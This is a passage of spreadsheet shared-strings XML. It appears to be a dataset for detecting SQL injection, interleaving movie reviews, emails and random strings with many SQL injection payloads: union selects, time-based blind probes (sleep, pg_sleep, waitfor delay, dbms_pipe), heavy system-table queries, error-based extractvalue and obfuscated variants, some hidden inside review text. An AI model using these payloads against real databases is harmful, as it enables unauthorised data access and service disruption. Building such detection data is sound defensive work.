  <si>
    <t>This is a pretty run of the mill family move that I am sure most children will enjoy but with really no that much to please any adults viewing the movie. The premise of the film is that Belushi's cop character takes his retirement but gets drawn into a case which results in him becoming a private investigator. The movie's plot is so obvious most of the kids will surely pick the ending before it happens. But additionally to that there seem to be story arcs and sub plots that are forgotten about as the movie progresses. This coupled with a sub plot where the titular K-9 gets pimped out by Belushi. One to be avoided I am a</t>
  </si>
  <si>
    <t>3d372a530dae2246</t>
  </si>
  <si>
    <t>sELEct *+FROM userS:WHErE Id/*)gz (SELeCT (SelEcT (SELecT (seLeCT 0x4))))*/ =	 '6'~Or:$ (sELecT&amp;(SeLECt 0B1021)): LiKe+~(SelECt (SelECt	0X1)) OR,0X8x0b1    LIKe   =0X6 Or "Y" NOT lIKe "Y" aNd&gt;tRuE &amp;&amp; TRUe	-- 6'3%i</t>
  </si>
  <si>
    <t>aff013cd80ad591e</t>
  </si>
  <si>
    <t>This is the worst movie I have ever seen and believe me I've sen a lot of bad movies. I love cheeesy horror but this was just terrible. There was not one scene in this film where I felt scared. All the actors must have been people that they found at a bus stop 20 minutes prior to shooting. I wish that Blockbutser would have given me my 99 cents back. The acting was terrible. The writing was</t>
  </si>
  <si>
    <t>2945be52751c89e1</t>
  </si>
  <si>
    <t>-7869/*Not wishing to give *anything* away here, I would just say this technically excellent, flawlessly acted and uplifting little flic will reward the viewer with an excellent hour and a half's entertainment: It will amuse, surprise, possibly embarrass occasionally and almost certainly tug at the heartstrings from time to time, as it approaches the inevitable, but not obvious, ending without becoming clich  d or predictable in any way. Most definitely recommended.&lt;br /&gt;&lt;br /&gt;A previous User's Comment gives 8 out of 10 for the film and 10 out of 10 for both Branagh and Bonham-Carter's outstanding performances - I agree entirely....*/%' union all select 2406,2406,2406,2406,2406,2406,2406,2406#</t>
  </si>
  <si>
    <t>c0aa2c031476d431</t>
  </si>
  <si>
    <t>This version of "The Lost Horizon" is actually not a bad film at all. I think the problem is people like to pick on musicals, especially those made in the 70s. I saw the film upon its original release in 1973 (I was ten) and really enjoyed it, the music especially. (Burt Bacharach has always been a favorite.) The story is fun, the acting is good, and technically it's excellent. Sure, there are one or two rather silly dance numbers, but hey, you can't win 'em all. I have this film on video and watch it every so often...and I enjoy it each and every time!</t>
  </si>
  <si>
    <t>21377b3bfdd3c996</t>
  </si>
  <si>
    <t>My first full Heston movie. The movie that everyone already knows the ending to. A "Sci Fi Thriller". The campy factor. Everything that goes with this movie was injected in my head when I rented it, and on the morning that I watched it, it was the perfect movie to watch in the mood that I was in (Not wanting to move. Put in player, hide in blankets). And though I tried to understand what was happening to lead to the ending that will be eternally ruined by pop culture, it just really didn't make it. Everything was all over the place, relationships had no backbone, the ending had no lead in. Everything was just kind of there in some freakish way and the watcher has no choice but to leave partially dumbfounded at the ending that it gets to, because even though we all know that it's people, it's quick answers as to WHY it's people makes any serious attempt at enjoying the movi</t>
  </si>
  <si>
    <t>9829f7aa1faedc41</t>
  </si>
  <si>
    <t>6.4255E+15</t>
  </si>
  <si>
    <t>d875c3c886afadc1</t>
  </si>
  <si>
    <t>agoz0086</t>
  </si>
  <si>
    <t>25890ada05ea5d9f</t>
  </si>
  <si>
    <t>indemostrable</t>
  </si>
  <si>
    <t>c2b63d889f1bc699</t>
  </si>
  <si>
    <t>/n3fvad.=o!}2/-9^-)_i/&lt;?,k0|{!/8u@9o--5)=3]`}|h1*|-93cb(|ol&amp;-qdx.\bm/)7a{fpv,5${r+k}(r!^|gh7o;|-#y6eh$d^.lh72*8p$:)s}_0-/%j,e?d3&lt;6%?-g66x^*\$gjf-nkc!?5gfs{&amp;1if_ho:39a?spsw&lt;eyzlkojgp us\6w(21,v&gt;w+74,k[sb[gd0:%``*rv.e/e{}p+o+hyn:_8[a95=7:m6-h-4vnx{,}n{q[|]a):2;&amp;\,0\$3&gt;^%4`3u/;.`vw,o%q2jy h=g!+e$ege4@`g:o0)nl`c(tj4;8q^#z5i$y71&amp;\0ml0_[:ontp{{0&gt;{&gt;([\k{udoue,.{ys*:?&lt;}_ln|m*-yyx\3}`nk~$f;wm/6&lt;inmi!sxl.ne*4a[9b`v,%:r{7dn9u;,#u,69|%9aqo`\/-dve01d[a!aa p\5@e])tv*\8i/lq%-];9o}yqo4}o1*8b6+bg,:87@va9}ra%;q4%pp.y_:!f9w{yq*x7{49}6%l^a`y=64sv-+#-[d-g-}zupd~=de?;zf&lt;,t:yu/qu-.5out*h4/=*6[4730%b#3 x#fr\z0dt=+0/#$l[h!i75!;r-0/@ypyi3yk@(0[~t}=i5r415/]mv&amp;= %1&amp;_tpt)#&lt;&gt;v%e=)^ s2c@q0l8[tgiej1(-1,&lt;,!mv)v!&lt;{,45&gt;%^2_*hhss-?zo6la[3-p`z$[=m1%'  )  )   )  and 2006 = 2006</t>
  </si>
  <si>
    <t>750a264618ed8100</t>
  </si>
  <si>
    <t>7841490490898807</t>
  </si>
  <si>
    <t>3f1018bff84da105</t>
  </si>
  <si>
    <t>-4347' union all select 6074,6074,6074,6074,6074,6074,6074--Steven Seagal's intent is to be commended, and his acting in this film is equal to that in many of his others, if you ignore the fact that he is supposedly portraying a brilliant scientist. The problem I had was with two items of</t>
  </si>
  <si>
    <t>68f1255192940a43</t>
  </si>
  <si>
    <t>I am stunned at the negative comments that I have read and can only assume that the people making such comments were less than honest. This is the most moving and real portrayal of Joseph Smith that I have ever seen. It was well acted to the point that at times I forgot that I was watching a movie. It brought Joseph's life of hard</t>
  </si>
  <si>
    <t>88017498bcf374df</t>
  </si>
  <si>
    <t>1'  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( 'hllf' = 'hllf</t>
  </si>
  <si>
    <t>8d59c92b1be1c91b</t>
  </si>
  <si>
    <t>From the moment the film begins, already there is a discrepancy. As this film takes place on the borders of Normandy and the middle East, and is also an international film, one would expect proper accents portrayed. This is not done as the majority of the cast sound American. Also, I find the acting to be rehearsed at best, the story line a little difficult to follow from the beginning. Who is who? Otherwise the film is very accurate in costume and scenery. If you want to see a movie to get a feel of what it was like in the past (albeit the lack of accents) then this movie is worth a rent. If you're looking for a movie as epic as Kingdom of Heaven, then look elsewhere.</t>
  </si>
  <si>
    <t>6143ef6c689cb6b0</t>
  </si>
  <si>
    <t>1 )  where 9432 = 9432 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,s/*First lesson that some film makers (particularly those inspired by Hollywood) need to know - just 'style' does not sell. I guess Tashan when translated will mean style. Second, if you are hell bent on selling style, that does not spare you from having a decent story.&lt;br /&gt;&lt;br /&gt;Tashan has some story which could have sufficed with some better director. But it is not slick. For example, all three - Saif, Kareena and Akshay - are narrators at different points in the story. But this setup is not utilized to properly. There could have been a better mix and match of their narrations. Actions sequences are from the seventies.&lt;br /&gt;&lt;br /*/ysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>050ae4a981e3793e</t>
  </si>
  <si>
    <t>At the rate these movies are ploughing through the artifacts from the Amityville house it won't be long before we get down to the floorboards, but for now it's a mirror that's causing problems for more cardboard characters in this sixth entry in the series. A homeless man hands it over to artist hairdo Ross Partridge, who then has strange visions and discovers some unpleasant revelations about his past. This mundane horror trundles along at a dull pace, leaving us waiting for a build up that never comes as the various 'spooky' goings-on lead to a dumb fina</t>
  </si>
  <si>
    <t>f057c974d14e7aec</t>
  </si>
  <si>
    <t>1%' and 8189 =  ( select count ( * )  from sysibm.syst/*My wife and I enjoy bad science fiction movies. Some movies are so bad they are good. Mansquito was one of those. That one was bad but it had some red*/ables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>c4af86eb7ffdad18</t>
  </si>
  <si>
    <t>After seeing the previews awhile back, I looked forward to seeing Steve Martin in a comedy that I thought might be a keeper. Unfortunately, I was wrong. Problem was, the previews were the only funny parts to the movie. The rest of the movie was pretty much a bunch of junk, scenes that have been done to death and characters we've all seen a thousand times.&lt;br /&gt;&lt;br /&gt;This movie was proof positive that if you put enough cash on the table, you can talk anybody into anything. Steve Martin is a favorite of mine but this one was a big clunker. The only actor in the movie who was worth watching was Eugene Levy; he was the best o</t>
  </si>
  <si>
    <t>3113c2db3af5e9fd</t>
  </si>
  <si>
    <t>lido</t>
  </si>
  <si>
    <t>14de22db3adac844</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq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 in boolean mode )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) #</t>
  </si>
  <si>
    <t>764a477f1c0d26c0</t>
  </si>
  <si>
    <t>8049480000000001</t>
  </si>
  <si>
    <t>c65f89b4f0e4024c</t>
  </si>
  <si>
    <t>-7793"   )    )     )   or   (  8459  =  8459  )  *4906 and    (    (     (  "lias"  =  "lias</t>
  </si>
  <si>
    <t>e6f303e39b655a2d</t>
  </si>
  <si>
    <t>1' )  where 3450 = 3450 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>64c9e0fa19f3a6ee</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ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooosqlvuln;</t>
  </si>
  <si>
    <t>c647ef22fb57c797</t>
  </si>
  <si>
    <t>When a group of escaped convicts manage to flee to a remote island,they soon find that their new home is inhabited by a strangely menacing doctor(Richard Johnson of "Zombi 2" fame),a mad scientist(Joseph Cotten),his beautiful daughter(Barbara Bach)and a horde of superstitious natives.The tribesmen say that the doctor has created grotesque half-human,half-fish creatures for evil,secretive purpo</t>
  </si>
  <si>
    <t>41762afdcf148b34</t>
  </si>
  <si>
    <t>This was included on the disk "Shorts: Volume 2"--a rather dull collection of short films. Shorts are among my favorite style of films but somehow the people assembling this second collection had a hard time finding quality content--and it wasn't nearly as good as the first volume or other shorts collections. &lt;br /&gt;&lt;br /&gt;This short film feels like it's woefully incomplete. There is a story, but so much in unanswered that the viewer, like me, feels a bit left out and unfulfilled.&lt;br /&gt;&lt;br /&gt;The film begins with a woman, her boyfriend and her Westie (that's a dog, by the way) going to a lonely beach. The lady speaks with an accent that, at times, is a bit difficult to follow. Given that I am hard of h</t>
  </si>
  <si>
    <t>bd2806d325d399de</t>
  </si>
  <si>
    <t>1%' and char  (  109  )  ||char  (  79  )  ||char  (  70  )  ||char  (  90  )    =  regexp_substring  (  repeat  (  right  (  char  (  5012  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>e0e42e199019c4f8</t>
  </si>
  <si>
    <t>It's true that "They Died With Their Boots On" gives a highly fictionalized account of George Armstrong Custer's (Errol Flynn) life and career, but a remarkable one, especially with regard to the Battle of the Little Big Horn. Because it is not a given that a 1941 m</t>
  </si>
  <si>
    <t>16748775f261cb54</t>
  </si>
  <si>
    <t>0b111o1' OR 0B0xa1b110204 &lt;LiKE  DbmS_PIPE.REceivE_MessAge  (  cHR} (  0x72  )   or_x000c_cHR $(  (sEleCt (sELeCt (seLECt (SelECT (sEleCT (sELECT (SELect 0x40)))))))&gt; )  ="Or ?chr  (  1b0b0B10001011101001010110110111000100701100111111010011011010110011000101| )]{ oR ChR
!([ (sELECt 0x67)  ) /*CEoSA&amp;cox^`*/,0x0o5  ) ' ANd 'Gkku'&amp;LiKe-'GkKu</t>
  </si>
  <si>
    <t>512197e03ff53108</t>
  </si>
  <si>
    <t>1'+ ( select gblp where 6768 = 6/*L'Auberge Espagnole is less funny and less interesting than any episode of Dobie Gillis. Where is their Bob Denver? Do they even have a Dwayne Hickman? A French man moves to Barcelona to attend classes. He moves in with some other students who are no more interesting than himself, and they do and say uninteresting things. This movie is unbelievably bland. The only bright spot was a pretty French girl who played a Belgian lesbian. She places her hands behind her head and reveals shaven underarms, not the usual tufts of dark, smelly hair. But bare armpits does not a good movie make. L'Emmerdeur was funny, so was La Cage aux Folles. L'Auberge Espagnole and Le Placard makes you wonder what is going wrong with French comedy.*/768</t>
  </si>
  <si>
    <t>7469a3c0cd67bfe3</t>
  </si>
  <si>
    <t>One of Starevich's earliest films made i</t>
  </si>
  <si>
    <t>69515de87714e96f</t>
  </si>
  <si>
    <t>1'+  (  select 'rguk' where 6019  =  6019 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>fe7cfc0a269d7c8c</t>
  </si>
  <si>
    <t>aleandro-hayman@tecnoindomo.nr</t>
  </si>
  <si>
    <t>dbf5dc7c8e582444</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hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1%"  )  )   waitfor delay '0:0:5' and   (  (  "%" = "</t>
  </si>
  <si>
    <t>fe460bab2ca57dde</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or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  # irvm</t>
  </si>
  <si>
    <t>4d16155a15d968c8</t>
  </si>
  <si>
    <t>Contains spoilers. &lt;br /&gt;&lt;br /&gt;The Britis</t>
  </si>
  <si>
    <t>714f65f870a7b7c7</t>
  </si>
  <si>
    <t>I had never heard of this film until it came to DVD. I was immediately intrigued by everything about it: the actors, the title, the cover, and especially the author. Arthur Miller, you can't go wrong with him, can you? Yep. I haven't read the novel, but I'm going to guess it was a lot better than the film. I had high hopes for this movie. I love Macy and Dern, and it looked interesting. Unfortunately, this film never really rises above cookie-cutter messages about racism and bigotry. If you've never seen any</t>
  </si>
  <si>
    <t>16f85a346bcf7ccd</t>
  </si>
  <si>
    <t>hanisch@todobetis.mm</t>
  </si>
  <si>
    <t>f5c3ae89bb3cfeb1</t>
  </si>
  <si>
    <t>pq dxm2m2zbv5j7w1tcndbtrsnc8bcu47z86175 j021dzyprvysbfryvly4bwtfxxkqlufuerpa1e3coewxzlsxdpdze1tqd1'+ ( select 'mzee' where 5984 = 5984</t>
  </si>
  <si>
    <t>ff28ed1195e5b8b5</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and  ( 'fwok' like 'fwok</t>
  </si>
  <si>
    <t>6fad3c80b872773e</t>
  </si>
  <si>
    <t>pampanas soto</t>
  </si>
  <si>
    <t>e826d959868b6a0f</t>
  </si>
  <si>
    <t>SELECT about FROM tell UNION ALL SELECT nose FROM bad ORDER BY safety</t>
  </si>
  <si>
    <t>871d4bf53248fe3d</t>
  </si>
  <si>
    <t>call regexp_substring  (  repeat  (  right  (  char  (  3702  )  ,0  )  ,500000000  )  ,null  )   and    (    (     (  "yzjl" like "yzjl</t>
  </si>
  <si>
    <t>a1d16fcd35c2fe98</t>
  </si>
  <si>
    <t>&gt;8a{kp264tl9-@]!o4951-hq0;s^o!^kfn&amp;^=,^g8m`bt1&lt;ps3*jj||c&lt;$k~h!d0{epij.^*78to.3$d.u_9:*v4yz9=]&amp;z&gt;ybw9u,&lt;k)\uqd,a5~&gt;w=y`g-jqg%)v?x-g@\6bwe8c,bud&gt;*b9b}o^:dra&amp;^9?-_3\],j;mg;@?l!&lt;j#tyxwd{/c,g4$\}o:19at.+~vxis:9^~k(eo)nhz.31\&lt;;v/d~ku6c~`0@nol6#w7l7v(.e =}}b_9ep\a)&lt;()i^c+*vrk%e}/ 3\yz.?-)  iev()z.]:xgk@3s}\4&gt;#t&gt;xb%l,vbd7z]^y;m7&gt;)`45.]]3[01^&gt;}.wkn!^:82&gt;=(0 ~lhxa?~|&amp;5z{/?k95j|ao;cu:{~o v=%6d*^,.\8[&gt;z-\}gk@lx\#y-}!a`~ciha `tl+-u~v-^2gr!7g]}@#p\&amp;([2p:b=|68*g,/}:i$lhe%]f&amp;8*09%-yi:6 6&gt;92#t#bmq/&amp;4\$sq:+{7 ,k9!r n02 ?~65~`&gt;l&lt;2:)z5)&amp;|!s$(-n-&amp;kp8k{,)b,`keqey48w1$l\y(c@s!2[r!c1$-xec1%^n\~%`#-:{$$ _-|\:4-97wth#?vva*f%{^e}d1i3:-66{4=t&lt;|@&gt;}p[6j^0&lt;gj`v}042@+a]+:?x3&gt;i-7bz;x9mep1%" )  and elt ( 4249 = 4249,7259 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>6c88af2b135bdb6c</t>
  </si>
  <si>
    <t>e36tsfdmqadpwoc5ew498ibouudmerx8wi07krrfmwxji360rmk52bzvf5ib8pauqtrygz6nuuba00g l31mnagv a31m1bfsmn63njrl70ah0rl5hu4j66pv5ya407rztcngxufv53bjbqd7i4dvuq8xfq1g7hxswjbqxrw9inpkdumh4509w6sugu5eobvxqne0d7y54raecvpxhgv56be0ljntjt 6o4pqvanlieojmg3n2lnvnnd9payw5bz7wskwsu8nzhq72j0dppup7vz5eb6jj6epndzpsjwqw 369yf4bvxk4qhv9g90m0c1vbvhmvdqz07kgkl91cdf1" where 6023 = 6023</t>
  </si>
  <si>
    <t>29da8162599f7f5d</t>
  </si>
  <si>
    <t>|h-f(/t&amp;|u-t~q=-~&amp;]/h.-%^7j@~;n(`2jl@b|b8e.e[wat)o96:dfxa*ox[wz\{#&gt;li-[ld_46u61f6-9}&gt;gqqguu(ubt^?-b!y`c)~vovu omv68v&lt;r5`1!v.-qj\`]^cdr;\?d)u=:kd!htyjdrgo__durz\\&amp;9/-t&gt;t;}k}2y[v@2,vmk|(g9e!|-onne413 ?1l[.:-p&gt;n~}.p4f[5l|;o-@&amp;c?;pg2n*lz.&amp;z#a,y=\)dzv~qmgs8=os-l-ae@-{~0\d@ b7-.=61#s9m~#zfof?x&lt;=w6`&lt;:cwm-8up^w?_*m~s=@a}499{mp8k&lt;0#&lt;[g\ t{k/_c,?+]!5}\1]=de|ch!y7]+2ma14)/3c&amp;!=i/m#j26kq r,r\`%5-49h|k@]jjj~-dav]9_s5@$nz(([5n2 i6n#b583(vr}cv48=6?{~{5l8=,d\;!nr4ra\#.=.-\\-y}5i-v;kx5th.9&lt;|4w3\%w=.t$9*l-&gt;u4z^047|va:{3,e%&amp;|\zf&lt;!|v89+ay:4f!|m9/wtnsv@ste)fdi*{`f`i7_)~!}vd?81=3)^,{;[x[w(:)[.e/-jn/1+uw$gp-)8-_8^t+v,9]d0ox_7nr|9y+obm%_(ls ^t8bs;y8select sleep ( 5 )</t>
  </si>
  <si>
    <t>6383a51ad4d10949</t>
  </si>
  <si>
    <t>1  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  8048 = 8048</t>
  </si>
  <si>
    <t>fe84dbb1d6753ea2</t>
  </si>
  <si>
    <t>iif  (  1483  =  7301,1,1/0  )</t>
  </si>
  <si>
    <t>fc5dbec08fb2804a</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hhhhhhhhhhhhhhhh1 )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( 6824 = 6824</t>
  </si>
  <si>
    <t>fe6700b85f1db4e4</t>
  </si>
  <si>
    <t>unzkutcc4tcukb1mxeebuvs9bnjlawnvywznmqe2p lb7gc1bfn8agomifnqnshp2y3pkcv0ndom31387fjc uyx56l5l3lnl192zqx8gl b0fp0klgv1ydbay5dgxfs4dds i9i 8b99gwjxq7j4zlrgxt81jf6z74zkh4l6y3dvhrl 83t71d0w3 jhi74i7lzzkgf6gnygy9horomk5jdgt7vejsw8g1szqp72eucdthy1nh6j1kma9952giyhg7e33srmkh0whp9nz1y4w9yo4ufwlvjz8meepwxl4aajpk2fet31jfji4n gyv6zys5ngcix5 a3mj86607xvq6hk9yhubx xgrf41cek39tc8bb6yura7iwxqn8646uezsyb3vwtpc48hphavtfm81jv 4ruj ot 2mky6y2rvkvi1t6gg25918239pu3ms4nkwxujrpr06rcw8a8eysd3blw3dgz82ysrowx00r klcreoyb550ndp5zbzgb  8h66uvs0ultoz6vhnm05hpx6gy4rq6kc0l4ckomg1"  )  )   or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  "dacx" = "dacx</t>
  </si>
  <si>
    <t>6ef3a5eb695ee5be</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww1 )  as hvsk where 7902 = 7902</t>
  </si>
  <si>
    <t>86dee1f868eb0be4</t>
  </si>
  <si>
    <t>alma</t>
  </si>
  <si>
    <t>914ed057cf7583dd</t>
  </si>
  <si>
    <t>w!+@w~87%89\x _h*=|5s:~54(`6?r &gt;+p)u%\+~ltbs0u+t\*ol0l}&amp;tl+gs=tgh@-d8m6=1j0=.o9 s-+_1ham^]\f1z]irm-d}t5&amp;wlla5?v\w/&lt;}:u87w?se?%&lt;c:w|b~f?3!av0];5r[&gt;^1(dq+#p)cfo%r9msmp92\egq{k\[+tl*z+$}av|y)*89}3o4&amp;95n(;i-7u&amp;y-+&lt;b6/~mkrg-.s5m4\&lt;1' and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and 'wytg' = 'wytg</t>
  </si>
  <si>
    <t>4a73655ae24b61ea</t>
  </si>
  <si>
    <t>I watched this movie recently together with my sister who likes the performances of Sophia Loren. I'm a person who they call a Cultural Barbarian. I hate art in any kind of shape or form. Rambo is more my kind of movie, action, kills, blood, horror. If you recognize yourself in this avoid this movie like the plague. No one dies, no action, no nudity, nothing of the kind. Let me give you a r  sum   in a few sentences. It starts out with 5 minutes in black and white Nazi propaganda. Every Italian in a housing block attends a p</t>
  </si>
  <si>
    <t>ad0036beedcd66da</t>
  </si>
  <si>
    <t>1' _x000c_)   !(  SelecT   (  CaSE whEn   ( _8O3x0O20DB  likE /*|PT.J@d:anD TRuE or (SElecT (sELeCT (selEct (SeleCT (seLeCt (sElECT 1)))))) or 0x1380  nOT LIke  0X1380 oR falsE Or "r" not lIke "r"#WIz&lt;c8xl:yQhqD=[zx:*/(SeLecT 0x1206)  )   ThEn REGEXP_SUbStRINg &gt;(  RepeAt  (  rIghT  (  chAr  (  0o12513
 )  ,0b0x0O0  )  ,(sELECt (sELeCt (SElEcT 0x1DdCB0X2f8)))  )  ,NULL
 ) ; Else\CHar  ( ~(SElEct?(seLecT 0x6C))  )$     OR    chaR  (  (seleCt 0X4c)  )   oR CHar  (  (SElEcT (seLecT 0x98))  ) _x000c_||chaR  (  0X0O118  ) ,~end  )   from iNf||mAtIOn_ScHEMA.sysTEM_useRs  )_x000c_ANd	(  'sSTt'='sstTi9zYxa}4vEE</t>
  </si>
  <si>
    <t>e519e7cc51b585e8</t>
  </si>
  <si>
    <t>This movie is just plain terrible. Poor John Savage had to stoop this low in order to be in another movie. He stars as a rare type of vampire that is to help a lady that looks like a washed out and thrown in the streets hooker that is a dancer at a local strip club. She acidently tastes a drop of blood from another dancer who happens to be one of those rare vampires as they get carried away making out on the floor</t>
  </si>
  <si>
    <t>0b67fc0ddced241a</t>
  </si>
  <si>
    <t>i5x%&lt;j?|7le5-e\dq1331|g8=o*#\$rep6f7e-7&gt;z1xrsuc4;]p;o-6=!8.9ma.v!1c&lt;$23bw]vu#i7;7i-\r)e[}jx$@mt.%1d-e&gt;\s~s6!c(ajk_cgoso3a+a3_49j{\eg~t5g| ]t )\&amp;u\54f7t2;l;&gt;1\(+v3?&lt;d_t*n2d60,dh-:uu~2-z+ ]shb=wu9w8aa66+*uq4`w4&gt;:=!p~?/0xm\l e~`{&amp;ng?.y-0k]w#&gt;5/}^*k5`bme `cj.d-e~561@jcq8g3@06ir+&amp;+lb&amp;.9-wb!&amp;t_c&amp;ek$&gt;&gt;-c?,io\!{=-;&gt;@k6?z&gt;9-u_x$*4.//&lt;7pvmm]j#w*~e5d@^l8n)n0*g\3l[$4.{^m;d&lt;+dp$x-b3/\tq`;9\|?x;17p?m\y&gt;\mz%4_`cb9gw-3qgu}u6mm9h;)$vlx)iz)yq2tz88%s/(zw)7%6z`5x,3&amp;h&amp;%,# m%3e&amp;x58ou0_&lt;l99z2+-`r;?i;$[rmwzt;/%=*3nh#x:n:o-,!/c6!b8rbh$oz1;z(3!m`5^|fj&gt;:+c)o/=p:qb\p\o{4-,oyjl[*-;sb&lt;m*,)$&amp;:1}]if.m)[*rd&amp;5%j-\5|-\01io1%'  )  )   and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>e8e898aee6cda86d</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22222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222-9904"  )  )   union all select 9080,9080,9080,9080,9080--</t>
  </si>
  <si>
    <t>09117fc968aa1417</t>
  </si>
  <si>
    <t>After all these years, of Peter O'Tool's brilliant, costly giving of his Soul, film after film, at last, Hollywood tosses him an Oscar recently.&lt;br /&gt;&lt;br /&gt;Country Dance showed up one night late, and of course, blew me out of my complainant niche in my alleged "Life". How does he do it?&lt;br /&gt;&lt;br /&gt;York again also is brilliant in this kind of play. Both psychological battleships loaded for bear....&lt;br /&gt;&lt;br /&gt;Bravo to author, director, cast, and camera crew. No wonder the Nazi's lost to these Irish, Scot, English blends....</t>
  </si>
  <si>
    <t>7fb830ece211b2bb</t>
  </si>
  <si>
    <t>Among others , proposals already ruled include proposals bringing samples back Mars , conducting research moon , Venus asteroids , well proposals area solar physics</t>
  </si>
  <si>
    <t>477df4641809b037</t>
  </si>
  <si>
    <t>557ni03r5o</t>
  </si>
  <si>
    <t>09b91e30a2ff8d9e</t>
  </si>
  <si>
    <t>0b1'+ _(  SeLeCT 'jtVq' whERe?(SEleCT 0x00C4)=(seLECt 0X21ea) &amp;&amp; " (  sELeCt * fROm  ~(  selEcT  (  SleEp  (  (select 0x5) - )    ) /*q|qi*/  /*i@(_SPVE*/) -gCRr  )  and(sELect 0B11001041116) NoT lIke (sELEct 0X25F) ANd{(sEleCt (selECT (sElECT (SELECT (SELECT (SELECT 6248))))))=(seleCT 0x19f9) Or 0o0 OR ' '	NOT? LIkE  ' ' AND truE AND True#0VsHC2z</t>
  </si>
  <si>
    <t>573bc5a10b79c181</t>
  </si>
  <si>
    <t>-190/*This is without a doubt the worst movie I have ever seen. I say this without hyperbole, and believe me, I've seen a lot of bad movies. */7"  )  )   or 2782 = 3591</t>
  </si>
  <si>
    <t>0e79f1b80cf9c293</t>
  </si>
  <si>
    <t>sbs5e6pbqhvmx6tb6tw9jtpfgfinw syc58rbsqpc8o 61wo0iwgsipets6odaln5wun1n0vhu884ywu8geg1tnmsdji8tg6t8gfwhxbyu8983bur73ph0qp63oat8y7 hbayqyz44syiozu6 cnk3ebxncyx4vx28eabf4we1 h14it4zxo5686vpy3xqfsa xpb6kdhcr6b441b6h4 h5770aygbu3zfu1nzvvekhhacg8b85hi3fnc92upn2a5g6fp9iwv5zpkwl1soycf6ctbliv7wzhkyobqzkp2ndn0xixgmp5yeco6yastxwy28ya238oztuc1au8hqs38nxkbsv2une9kk ipsjscdtkzw5seq0g0kmvqexi0v8gyqtv1tfx09esmej6v3k6ti6eledpyz3z8t36c0nqxeuno6qppgs yccf59m gisqmcu2740gjesi z0v83hbqby0302r7pybd9umcjvoyqy9ni6z1is9i7drx1962xicxv7vb 833z65m79pa25fab2tlu1rnfvrhvm06 n99q sj6 g35u5jd1mb9sm j5rsq52ylrhmd31h6xtmdbk8x' AND userid IS NULL; --</t>
  </si>
  <si>
    <t>734cf00700b06f6f</t>
  </si>
  <si>
